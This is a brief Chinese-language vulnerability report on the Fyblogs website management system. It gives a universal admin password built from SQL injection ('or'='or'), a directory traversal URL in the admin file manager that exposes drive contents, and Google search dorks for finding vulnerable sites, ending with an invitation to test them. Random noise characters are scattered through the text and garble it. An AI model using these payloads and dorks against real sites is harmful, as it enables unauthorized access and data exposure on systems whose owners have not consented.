漏洞类型: 未授权访问/权限绕过8 Q' ~: ~9 ?* N8 m
. F q" [" a, `; g/ k- \" ]简要描述:! P, J' `; L) X
6 F# D1 l6 ~) D z' R% p
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
9 `2 j* A: X. O3 y
' H5 D( o C+ j详细说明:; M0 Q4 ?/ m; c% ~% U Q
( I% d* O' Q6 ?8 F: j) O2 M
后台万能密码 'or'='or'
R9 Q, P& v9 e8 W2 p后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
! p) H2 `2 A( i9 d) S( qadmin/uploadfile.asp?currentFolder=/upfiles/../# r- w4 f& D; y0 L b8 k. P
2 l2 I' i6 x. `# i4 f2 ~漏洞证明:
1 d( h Y0 B# G$ J5 I. O0 t- K! A
谷歌:inurl:type.asp?id=1 新闻中心, M( I5 i$ g' ~& F, O% q+ E J
或者 :inurl:download_ok.asp?% a, J( I7 C. g3 {2 M3 v+ H
N& b" }5 K4 y! p可以测试8 \/ }( Q$ x8 A% u6 S
& |8 ]0 q1 J5 M4 Y
2 Z' ~4 E7 L) |# U+ W |